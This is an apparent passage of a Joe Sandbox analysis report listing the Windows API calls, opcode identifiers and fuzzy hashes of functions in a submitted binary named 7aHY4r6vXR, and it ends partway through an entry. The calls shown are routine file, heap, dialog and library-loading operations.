                                                            • Opcode ID: 40913c408f541b08005a79d2cba7f074780ffd42ad78a6dd18af26aa5808fe65
                                                            • Instruction ID: 1521297240ea555c54227954f26c331f066bf2a02d14cf194740791f7dd2864d
                                                            • Opcode Fuzzy Hash: 40913c408f541b08005a79d2cba7f074780ffd42ad78a6dd18af26aa5808fe65
                                                            • Instruction Fuzzy Hash: E4E0E571A8521C7BC609AB65DC06F7EBB94DB48721B0202F9F90997280CE706E10C6D6
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEEAF9
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: 3Ro
                                                            • API String ID: 1269201914-1492261280
                                                            • Opcode ID: f9d39f4e09c0dd54816d39ed6a95236f56247b48ab761a66ac8721a61106c9b0
                                                            • Instruction ID: e9f3a2fb47f7d1d25d67deedf2b52832c48ff3742d67e2ba4458bc37e34b1182
                                                            • Opcode Fuzzy Hash: f9d39f4e09c0dd54816d39ed6a95236f56247b48ab761a66ac8721a61106c9b0
                                                            • Instruction Fuzzy Hash: 58B012C62AA0C27C750863021DC2C37014CC0C0BA0F30917EF424CC0C1EE81CC455431
                                                            APIs
                                                              • Part of subcall function 00BFB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BFBA44,?), ref: 00BFB7E6
                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00BFBA89,?,00000000), ref: 00BFBC64
                                                            • GetCPInfo.KERNEL32(00000000,00BFBA89,?,?,?,00BFBA89,?,00000000), ref: 00BFBC77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: 6ab0918a803e0363ee25f367dd135b21cffe78fd68ece5f086bbe34abbe601ec
                                                            • Instruction ID: 0c713320dff683ddf0415633239aa6fd0a9739d48bb938ea04ea4f38bb8b213b
                                                            • Opcode Fuzzy Hash: 6ab0918a803e0363ee25f367dd135b21cffe78fd68ece5f086bbe34abbe601ec
                                                            • Instruction Fuzzy Hash: 32515578A0024D9EDB249F35C881EBBBBE4EF41300F2844FED6968B651D7349949CB91
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00BD9A50,?,?,00000000,?,?,00BD8CBC,?), ref: 00BD9BAB
                                                            • GetLastError.KERNEL32(?,00000000,00BD8411,-00009570,00000000,000007F3), ref: 00BD9BB6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: b2408948a013de5d5855771925c87cc8d281e20bb8660c5fd8f2618371f0e3d0
                                                            • Instruction ID: 1a4da5a84e363061713599742bf1e59d2a823418135d5ea0c16cf08862cf64eb
                                                            • Opcode Fuzzy Hash: b2408948a013de5d5855771925c87cc8d281e20bb8660c5fd8f2618371f0e3d0
                                                            • Instruction Fuzzy Hash: 8B41DB316043418FDB24DF25E58496AF7E9FBD4320F168AAFE89583360F770ED448A91
                                                            APIs
                                                              • Part of subcall function 00BF97E5: GetLastError.KERNEL32(?,00C11030,00BF4674,00C11030,?,?,00BF3F73,00000050,?,00C11030,00000200), ref: 00BF97E9
                                                              • Part of subcall function 00BF97E5: _free.LIBCMT ref: 00BF981C
                                                              • Part of subcall function 00BF97E5: SetLastError.KERNEL32(00000000,?,00C11030,00000200), ref: 00BF985D
                                                              • Part of subcall function 00BF97E5: _abort.LIBCMT ref: 00BF9863
                                                              • Part of subcall function 00BFBB4E: _abort.LIBCMT ref: 00BFBB80
                                                              • Part of subcall function 00BFBB4E: _free.LIBCMT ref: 00BFBBB4
                                                              • Part of subcall function 00BFB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BFBA44,?), ref: 00BFB7E6
                                                            • _free.LIBCMT ref: 00BFBA9F
                                                            • _free.LIBCMT ref: 00BFBAD5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorLast_abort
                                                            • String ID:
                                                            • API String ID: 2991157371-0
                                                            • Opcode ID: e3191a189d0df71c8b9302b5346819b6ed23c3e1f5e06f88c7e9b3b618bf9139
                                                            • Instruction ID: ded22f7773f20c36befd34a244bac315e1c06a1be8c592898242e5afe7154ce4
                                                            • Opcode Fuzzy Hash: e3191a189d0df71c8b9302b5346819b6ed23c3e1f5e06f88c7e9b3b618bf9139
                                                            • Instruction Fuzzy Hash: 5A317C3190420DAFDB14EBA8D481FBDB7E5EF41320F2540D9EA149B2A2EF329D48DB50
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD1E55
                                                              • Part of subcall function 00BD3BBA: __EH_prolog.LIBCMT ref: 00BD3BBF
                                                            • _wcslen.LIBCMT ref: 00BD1EFD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            • Opcode ID: 8d27c3746c5dbd3a0128af4072fe88618916ffa92923e3a8488b4e16c20c4332
                                                            • Instruction ID: d658ef1c17ab8b5848a2c5f95465840fc089a64ce60f162eac7731b3d84f6175
                                                            • Opcode Fuzzy Hash: 8d27c3746c5dbd3a0128af4072fe88618916ffa92923e3a8488b4e16c20c4332
                                                            • Instruction Fuzzy Hash: D6314A71905209AFCF11DFA9C945AEEFBF6EF08300F2008AAE845A7351D7325E00DB60
                                                            APIs
                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00BD73BC,?,?,?,00000000), ref: 00BD9DBC
                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00BD9E70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: File$BuffersFlushTime
                                                            • String ID:
                                                            • API String ID: 1392018926-0
                                                            • Opcode ID: 992914f1be81152ec6bd6b833da5dba2a825e2b4ac1f6f29e9dc79abf37d7931
                                                            • Instruction ID: e7615d6b0c3a7882acbfaccc7e4a98e26fb2609f51c9e8b209feee58826dd8c3
                                                            • Opcode Fuzzy Hash: 992914f1be81152ec6bd6b833da5dba2a825e2b4ac1f6f29e9dc79abf37d7931
                                                            • Instruction Fuzzy Hash: 2F21D031249285ABC714DF35C891AABFBE8EF55704F0849AEF4C587281E339E90CDB61
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00BD9F27,?,?,00BD771A), ref: 00BD96E6
                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00BD9F27,?,?,00BD771A), ref: 00BD9716
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: a444715827db890ad4d0e8adccec72e5ba151043358ea28594c6a1c43671f20f
                                                            • Instruction ID: edcae216baff3fe699f1bab4e8553c267e64e6064f46a3d604de1fea2d3b6ce3
                                                            • Opcode Fuzzy Hash: a444715827db890ad4d0e8adccec72e5ba151043358ea28594c6a1c43671f20f
                                                            • Instruction Fuzzy Hash: 8821CF71100344AFE3309A65CC89FA7B7DCEB49324F100A5AFA96C22D1E7B4A884DB31
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00BD9EC7
                                                            • GetLastError.KERNEL32 ref: 00BD9ED4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 5018d7e7dae3dab883a27f23707b1ecd9653868c5df58366ba6d19588b5f407d
                                                            • Instruction ID: 64de9e965afb1d3dfa15c35dd9fbc9d3e2dfc80fefbe8921ac747e23d5571c54
                                                            • Opcode Fuzzy Hash: 5018d7e7dae3dab883a27f23707b1ecd9653868c5df58366ba6d19588b5f407d
                                                            • Instruction Fuzzy Hash: 2911E530600704EBE724C628C880BA6F7E9EB45360F504AABE552D27D0F774ED89C760
                                                            APIs
                                                            • _free.LIBCMT ref: 00BF8E75
                                                              • Part of subcall function 00BF8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BFCA2C,00000000,?,00BF6CBE,?,00000008,?,00BF91E0,?,?,?), ref: 00BF8E38
                                                            • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00C11098,00BD17CE,?,?,00000007,?,?,?,00BD13D6,?,00000000), ref: 00BF8EB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocAllocate_free
                                                            • String ID:
                                                            • API String ID: 2447670028-0
                                                            • Opcode ID: a52dbbbc75a735f0bb564188252d49a9f3ddcc19a92d6b3319580cf2f54098e8
                                                            • Instruction ID: 6cc15050c507d26cb2a1489ae7c2869b1aae61edfc83bf84ed245faf2a55b2d0
                                                            • Opcode Fuzzy Hash: a52dbbbc75a735f0bb564188252d49a9f3ddcc19a92d6b3319580cf2f54098e8
                                                            • Instruction Fuzzy Hash: 80F0963260511D76DB212A25AC05B7F77D8CF91B70F2541E5FB14A7191DF70DD0985A0
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 00BE10AB
                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 00BE10B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            • Opcode ID: de6ad8d0ea808256b5302e80cf60d391e89870736dbdb68abc997eb9360da273
                                                            • Instruction ID: e367edfd9b5aff152c0243e57ce35b848087f927edabd902e812ae36a273d4d0
                                                            • Opcode Fuzzy Hash: de6ad8d0ea808256b5302e80cf60d391e89870736dbdb68abc997eb9360da273
                                                            • Instruction Fuzzy Hash: C2E0D832B101C5E7CF0987B99C05AEF73DDEA4420873085B6E403D3102FA34DE418760
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA501
                                                              • Part of subcall function 00BDBB03: _wcslen.LIBCMT ref: 00BDBB27
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA532
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: 202cd50d5fec49f1031c21cbc24604ebeb3a9657f773ec97372bf58c800bde0e
                                                            • Instruction ID: b9f3c8029d9daab99ad2161b7841f7dc895d5f8ea0b723e614074fd796d23eb3
                                                            • Opcode Fuzzy Hash: 202cd50d5fec49f1031c21cbc24604ebeb3a9657f773ec97372bf58c800bde0e
                                                            • Instruction Fuzzy Hash: DEF06532240149BBDF016F60DC45FDE77ACEF14389F4480A2B945D5260EB71DAD8DB60
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,00BD977F,?,?,00BD95CF,?,?,?,?,?,00C02641,000000FF), ref: 00BDA1F1
                                                              • Part of subcall function 00BDBB03: _wcslen.LIBCMT ref: 00BDBB27
                                                            • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00BD977F,?,?,00BD95CF,?,?,?,?,?,00C02641), ref: 00BDA21F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: DeleteFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2643169976-0
                                                            • Opcode ID: 2c6afba8cf2c414d39ec2c36350bc3de879b970f4ccc302f47097346cb521eb4
                                                            • Instruction ID: 8bd39e64fbe834e0ed94962a93e2fb9ad7ac406fd642b8294d1e2cb82d891f2b
                                                            • Opcode Fuzzy Hash: 2c6afba8cf2c414d39ec2c36350bc3de879b970f4ccc302f47097346cb521eb4
                                                            • Instruction Fuzzy Hash: D7E092311402497BDB015F61DC45FDD779CEB08385F4840A2B944D2150FB61DE84DA54
                                                            APIs
                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,00C02641,000000FF), ref: 00BEACB0
                                                            • CoUninitialize.COMBASE(?,?,?,?,00C02641,000000FF), ref: 00BEACB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: GdiplusShutdownUninitialize
                                                            • String ID:
                                                            • API String ID: 3856339756-0
                                                            • Opcode ID: 5ccc94d8003c04c5d3a34fd10d930c13dd2a8730d94048f3441bc01ea57a18f2
                                                            • Instruction ID: 1ff536ffade7f25af1b55a30837bb07525276ac33b2af516f9dca812bf2d80d0
                                                            • Opcode Fuzzy Hash: 5ccc94d8003c04c5d3a34fd10d930c13dd2a8730d94048f3441bc01ea57a18f2
                                                            • Instruction Fuzzy Hash: 31E06D72604690EFCB009B59DC4AB49FBACFB89B20F00426AF416D37A0CB74A940CA90
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00BDA23A,?,00BD755C,?,?,?,?), ref: 00BDA254
                                                              • Part of subcall function 00BDBB03: _wcslen.LIBCMT ref: 00BDBB27
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00BDA23A,?,00BD755C,?,?,?,?), ref: 00BDA280
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: 1d3d831dedad4815aaea8a477844d8bcc8db73735c1ab7f4a21522f23fbd469d
                                                            • Instruction ID: 1cf0e9d957b6612d59edf6654e6823cfc39db14afda68698f9d195330ebc71c2
                                                            • Opcode Fuzzy Hash: 1d3d831dedad4815aaea8a477844d8bcc8db73735c1ab7f4a21522f23fbd469d
                                                            • Instruction Fuzzy Hash: 97E092315001649BDB20AB64CC05BD9F79CEB083E5F0542A2FD54E3294E770DE44CAA0
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00BEDEEC
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 00BEDF03
                                                              • Part of subcall function 00BEB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BEB579
                                                              • Part of subcall function 00BEB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEB58A
                                                              • Part of subcall function 00BEB568: IsDialogMessageW.USER32(0001043E,?), ref: 00BEB59E
                                                              • Part of subcall function 00BEB568: TranslateMessage.USER32(?), ref: 00BEB5AC
                                                              • Part of subcall function 00BEB568: DispatchMessageW.USER32(?), ref: 00BEB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                            • String ID:
                                                            • API String ID: 2718869927-0
                                                            • Opcode ID: 7dc6953e8362a3d761b46121bd77f6c9c4fd6bbd45d5a7cfa319ef8acefe9ee9
                                                            • Instruction ID: c9fca0a6a774d2801dcae4d86a2e7344e08c87b1cc3818b18237f6618bba25d6
                                                            • Opcode Fuzzy Hash: 7dc6953e8362a3d761b46121bd77f6c9c4fd6bbd45d5a7cfa319ef8acefe9ee9
                                                            • Instruction Fuzzy Hash: 52E092B251428866DF02AB61DC06FDE3BECAB15785F044892B201DA1E2EA78EA148761
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BE0836
                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BDF2D8,Crypt32.dll,00000000,00BDF35C,?,?,00BDF33E,?,?,?), ref: 00BE0858
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
